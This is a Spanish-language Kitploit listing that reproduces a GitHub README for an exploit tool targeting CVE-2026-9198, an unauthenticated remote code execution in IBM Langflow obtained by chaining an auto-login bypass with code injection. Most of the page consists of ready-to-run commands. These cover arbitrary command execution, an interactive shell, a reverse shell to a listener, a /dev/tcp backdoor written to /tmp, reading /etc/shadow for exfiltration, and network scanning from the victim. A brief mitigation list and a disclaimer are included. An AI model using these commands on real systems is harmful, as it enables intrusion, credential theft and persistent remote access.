Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-9198 — IBM Langflow RCE no autenticado mediante omisión del auto-inicio de sesión | Kitploit
Herramientas/GitHubGitHub/0xgh057r3c0n/cve-2026-9198
Generación de PayloadsExplotaciónExplotación de Aplicaciones WebComando y ControlAutenticaciónRed TeamingHerramienta de Acceso Remoto
GitHub0xgh057r3c0n/cve-2026-9198

CVE-2026-9198

IBM Langflow RCE no autenticado mediante omisión del auto-inicio de sesión

Ver Repositorio
1hace 27 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Logotipo de Langflow

🚨 CVE-2026-9198

IBM Langflow OSS RCE no autenticado mediante omisión de auto-login

License: MIT Python 3.6+ Security


📋 Resumen

CVE-2026-9198 es una vulnerabilidad crítica de ejecución remota de código (RCE) no autenticada en IBM Langflow OSS. Este exploit encadena dos vulnerabilidades:

  • CVE-2026-9103: Omisión del auto-login que otorga tokens JWT de superusuario a llamadas no autenticadas
  • CVE-2026-8481: Inyección de código en el endpoint /api/v1/validate/code que permite la ejecución arbitraria de Python

⚠️ ADVERTENCIA: Esta herramienta es solo para pruebas de seguridad autorizadas y fines educativos. El uso no autorizado es ilegal.


🚀 Características

  • 🔓 Omisión de auto-login - Obtiene automáticamente el token JWT de superusuario
  • 💻 Pseudo-shell interactiva - Prompt dinámico con nombre de usuario y directorio actual
  • 📝 Ejecución de un único comando - Ejecuta comandos arbitrarios del sistema
  • 🔄 Reverse shell - Entrega de payload reverse shell en una sola línea
  • 🎨 Salida con colores - Retroalimentación visual con colores ANSI
  • ⚡ Rápido y fiable - Construido con un manejo robusto de errores

📦 Instalación

Requisitos previos

  • Python 3.6 o superior
  • Gestor de paquetes pip

Paso 1: Clonar el repositorio

root@kitploit:~
git clone https://github.com/0xgh057r3c0n/CVE-2026-9198.git
cd CVE-2026-9198

Paso 2: Instalar dependencias

root@kitploit:~
pip install termcolor

O instala todas las dependencias de una vez:

root@kitploit:~
pip install -r requirements.txt

Paso 3: Verificar la instalación

root@kitploit:~
python CVE-2026-9198.py --help

Deberías ver el menú de ayuda con todas las opciones disponibles.


🎯 Uso

Ejecución básica de comandos

Ejecuta un único comando en el objetivo:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> -c "id"

Ejemplo:

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "whoami"

Pseudo-shell interactiva

Lanza una shell interactiva con prompts dinámicos:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> --shell

Características:

  • Prompt dinámico que muestra user@host y el directorio actual
  • Soporte del comando cd con actualización automática del prompt
  • Historial de comandos (según la terminal)
  • Formato de salida limpio

Ejemplo de sesión:

root@kitploit:~
┌─[root@0xgh057r3c0n]─[~]
└──╼ $ whoami
root
┌─[root@0xgh057r3c0n]─[~]
└──╼ $ cd /tmp
┌─[root@0xgh057r3c0n]─[/tmp]
└──╼ $ pwd
/tmp

Reverse shell

Envía un payload reverse shell a un listener:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> --lhost <your_ip> --lport <port>

Ejemplo:

root@kitploit:~
# On your machine - Start listener
nc -lvnp 4444

# Then run the exploit
python CVE-2026-9198.py -t 192.168.1.100 --lhost 192.168.1.50 --lport 4444

Puerto personalizado

Si Langflow se ejecuta en un puerto no estándar:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> -p <port> -c "whoami"

Ejemplo:

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -p 8080 -c "ls -la"

Uso de un token previamente obtenido

Omite el proceso de auto-login y usa un token existente:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> -k <your_jwt_token> -c "id"

Configuración de timeout

Ajusta el timeout HTTP para redes más lentas:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> --timeout 30 -c "whoami"

📝 Argumentos de línea de comandos


🔧 Ejemplos

1. Recopilación básica de información

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "uname -a"

2. Exploración del sistema de archivos

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 --shell
# Then inside the shell:
ls -la
cat /etc/passwd

3. Backdoor persistente

root@kitploit:~
# Create a reverse shell that persists
python CVE-2026-9198.py -t 192.168.1.100 -c "echo 'bash -i >& /dev/tcp/192.168.1.50/4444 0>&1' > /tmp/backdoor.sh && chmod +x /tmp/backdoor.sh && /tmp/backdoor.sh"

4. Escaneo de red (desde el objetivo)

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "nmap -sP 192.168.1.0/24"

5. Exfiltración de archivos sensibles

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "cat /etc/shadow | base64"

🛡️ Mitigación

Para protegerte contra esta vulnerabilidad:

  1. Desactiva el auto-login en entornos de producción
  2. Aplica los parches publicados por IBM para Langflow
  3. Restringe el acceso de red a las interfaces administrativas de Langflow
  4. Monitorea las solicitudes API inusuales a /api/v1/auto_login y /api/v1/validate/code
  5. Usa reglas WAF para bloquear patrones de payload sospechosos

⚠️ Aviso legal

Esta herramienta se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas. El autor no es responsable de ningún uso indebido o daño causado por este software. Los usuarios son los únicos responsables de cumplir con las leyes y regulaciones aplicables.


📄 Licencia

Este proyecto está bajo la Licencia MIT; consulta el archivo LICENSE para más detalles.


👨‍💻 Autor

0xgh057r3c0n

  • GitHub: @0xgh057r3c0n
  • Investigador de seguridad y pentester

📚 Referencias

  • Detalles de CVE-2026-9198
  • CVE-2026-9103 - Omisión de auto-login
  • CVE-2026-8481 - Inyección de código
  • Sitio oficial de Langflow

🤝 Contribuciones

¡Las contribuciones son bienvenidas! No dudes en enviar un Pull Request.

  1. Haz un fork del repositorio
  2. Crea tu rama de funcionalidad (git checkout -b feature/AmazingFeature)
  3. Haz commit de tus cambios (git commit -m 'Add some AmazingFeature')
  4. Haz push a la rama (git push origin feature/AmazingFeature)
  5. Abre un Pull Request

⭐ Historial de estrellas

Si encuentras útil esta herramienta, ¡considera darle una ⭐ en GitHub!


Hecho con ❤️ por 0xgh057r3c0n
Descargar herramienta
ArgumentoDescripciónRequeridoPor defecto
-t, --targetHost/IP objetivo o URL completa✅ Sí-
-p, --portPuerto de Langflow❌ No7860
-c, --cmdEjecutar un único comando❌ No"id"
--shellModo pseudo-shell interactiva❌ NoFalse
--lhostIP del listener del reverse shell❌ No-
--lportPuerto del listener del reverse shell❌ No4444
-k, --tokenUsar el token bearer proporcionado❌ No-
--timeoutTimeout HTTP en segundos❌ No20
--no-bannerOcultar el banner❌ NoFalse